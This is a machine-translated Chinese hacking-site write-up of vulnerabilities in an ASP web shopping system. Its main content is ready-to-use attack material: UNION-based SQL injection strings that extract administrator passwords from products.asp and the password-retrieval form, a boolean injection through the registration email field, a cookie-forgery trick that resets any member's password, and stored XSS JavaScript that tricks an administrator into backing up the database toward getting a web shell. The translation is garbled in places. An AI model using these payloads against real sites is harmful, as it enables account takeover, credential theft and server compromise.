On the web soft shopping online system a little bit of analysis-vulnerability warning-the black bar safety net

ID MYHACK58:62201026835
Type myhack58
Reporter 佚名
Modified 2010-05-03T00:00:00


Author:ninty Terrible set of procedures, I ASP is not too familiar, where is it written wrong also please large cattle pointing in! Injection: Found 3 can be injected into the place: Products. asp occurs in the Browse products The code is as follows:

<%set rss=server. CreateObject("adodb. recordset") rss. open "select * from products where the bookid="&request. querystring("id"),conn,1,3 //here, get the id directly fight to the SQL statement, the injection produce. if rss. eof or bof then response. write "alert('sorry, not this product!'); history. go(-1);" response. end end if dim des if not rss("metad")="" then des=rss("metad") end if if not rss("metak")="" then keya=rss("metak") end if %> <%=webname%>--Product Details "> "> /css. css" rel="stylesheet" type="text/css">

<!-- function OpenNews() { window. name = "news" win = window. open(",'newswin','left=1 1 0,width=6 0 0,height=4 2 0,scrollbars=1'); } //-->

<%if IsNumeric(request. QueryString("id"))=False then response. write("alert(""unauthorized access!""); location. href=""index. asp"";") response. end end if

Here is an interesting question ha, in the search after the library only after the ID is detected, do not know this programmer is how to think! Constructor injection statement is as follows:

http://localhost/shangwu/products.asp?id=353 union select'1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1',' 1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1',admin,password,'1','1' from admin

I use FF, because the back of javascript interference may lead to see results. With FF the JS disable. After submission, view the page source code to get the administrator account and password: ! [Size: 42.14 K Size: 5 0 0 x 3 8 5 Browse: 0 times Click to open a new window to browse the full map](/Article/UploadPic/2010-5/201053223037662.jpg)

Getpwd2. asp occurs in the Retrieve password when, the code is as follows:

<% username=request. form("username") //directly from the form to get the username value set rs=Server. CreateObject("Adodb. Recordset") sql="select * from [YX_User] where name='"&username&"' " //put the SQL statement is executed, the injection occurs. rs. open sql,conn,1,1 If rs. eof Then %> and... Omitted.... and <%if rs("Clue")<>"" then%>

Question: <%=rs("Clue")%> //the output here Clue the value of the column, you can use here directly the output of a We want the value of the column

In the Retrieve Password box enter:

admin' union select '1','1','1',password,'1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1 ','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1','1' ,'1','1','1','1','1','1','1','1' from admin where "='

! [Size: 19.19 K Size: 4 2 1 x 2 0 6 Browse: 0 times Click to open a new window to browse the full map](/Article/UploadPic/2010-5/201053223040632.jpg)

Next, directly got the administrator password:

! [Size: 23.62 K Size: 4 2 1 x 2 0 6 Browse: 0 times Click to open a new window to browse the full map](/Article/UploadPic/2010-5/201053223040460.jpg)

3. Register. asp occurs in the registered user when

set rs=server. CreateObject("adodb. recordset") rs. open "select * from [YX_User] where Mail='"&trim(request("useremail"))&"' or Name='"&trim(request("username"))&"'",conn,1,1 //directly get the useremail and username, it is added to the SQL. if rs. recordcount>0 then //if the query out the number of records is greater than 0 call usererr() //call usererr() rs. close else

Wherein usererr()the content is

sub usererr() response. write "" response. write "" response. write " · * user registration failure!· You input the username or e-mail address already exists, please return to re-enter!· Return to the previous page" end sub

We can useremail caterer is. Input a username which does not exist with a non-existent email,then the email plus we injected the statement, if the username or EMAIL already exists, we attach the SQL statement is established. As shown in Figure: ! [Size: 56.99 K Size: 4 9 3 x 5 0 0 Browse: 0 times Click to open a new window to browse the full map](/Article/UploadPic/2010-5/201053223040421.jpg)

EMAIL where the input is:

321564654@123.com ' or exists (select * from admin) or "<>'

Results: because of the presence of the admin table, and if the admin changed to aa, after submission to see is a blank page ! [Size: 52.03 K Size: 5 0 0 x 3 3 4 Browse: 0 times Click to open a new window to browse the full map](/Article/UploadPic/2010-5/201053223041908.jpg)

Change any user password: modify the member Password page, to see the process how a page is processed:

action=request. QueryString("action") username=request. cookies("Cnhww")("username") //username from Cookie to take to the select case action 。。。。 Omitted。。。。。 case "savepass" set rs=server. CreateObject("adodb. recordset") rs. open "select * from [YX_User] where name='"&username&"'",conn,1,3 if trim(request("userpassword"))<>"" then rs("password")=md5(trim(request("userpassword"))) //if the userpassword is not empty, it is to be modified end if rs. update rs. close set rs=nothing response. Write "alert('password changed successfully!'); window. location. href='"&request. servervariables("http_referer")&"';" response. End 。。。。 Omitted。。。。 end select

We can forge a Cookie to modify any member's password. you! First with our registered users to enter the member center, the point to change the password, open the WSE grab the data Pack. Caught: ! [Size: 112.14 K Size: 5 0 0 x 1 9 5 Browse: 0 times Click to open a new window to browse the full map](/Article/UploadPic/2010-5/201053223041834.jpg)

Put username=ninty changed to username=admin, here we modify the admin this user's password. Usernamepassword=1 2 3 4 5 6&userpassword2=1 2 3 4 5 6, so put it's password changed 1 2 3 4 5 6, This admin just a regular user, not the background of the administrator. Administrator information is not stored in this table. Save with NC submitted. ! [Size: 35.65 K Size: 5 0 0 x 3 2 3 Browse: 0 times Click to open a new window to browse the full map](/Article/UploadPic/2010-5/201053223041679.jpg)

To the front with 1 2 3 4 5 6 landing. Success! ! [Size: 78.78 K Size: 5 0 0 x 3 3 4 Browse: 0 times Click to open a new window to browse the full map](/Article/UploadPic/2010-5/201053223041941.jpg)

Cross-site The problem occurs in the membership message there: mymsg_hand1. asp

set rs=Server. CreateObject("ADODB. recordset") sql="select * from sms where (name='Administrators' or name='admin') and zuti='0' order by riqi desc" rs. open sql,conn,1,3 if rs. eof and rs. bof then response. write "Inbox no messages." else ...... Omitting the middle............ do while not rs. eof and pages>0 neirong=rs("neirong") riqi=rs("riqi") isnew=rs("isnew") fname=rs("fname") id=rs("id") if pages<1 0 then the response. write "" %> ...... Omitting the middle............

<%=replace(neirong,vbCRLF," ")%>

At the input only when the carriage return is replaced by a the As long as we in the writing across the station Code of the time don't add a carriage return on the line! In the comments there wrote:

var op = window. open('backdata. asp');setTimeout("back()",2 0 0 0);function back() {var form=op. document. forms[0];form. DBpath. value="../bbs/data/#wrtxcnshop. asp";form. bkDBname. value="test. mdb";form. submit();

So in the administrator view the message when it will automatically open the database backups page for the database backup, the backup will be in the databackup directory to generate a test. mdb

! [Size: 49.11 K Size: 5 0 0 x 3 0 6 Browse: 0 times Click to open a new window to browse the full map](/Article/UploadPic/2010-5/201053223042736.jpg)

Other vulnerabilities there are many interested friends yourself and then look at the code?... Get a SHELL then burst into a background upload of a picture backup.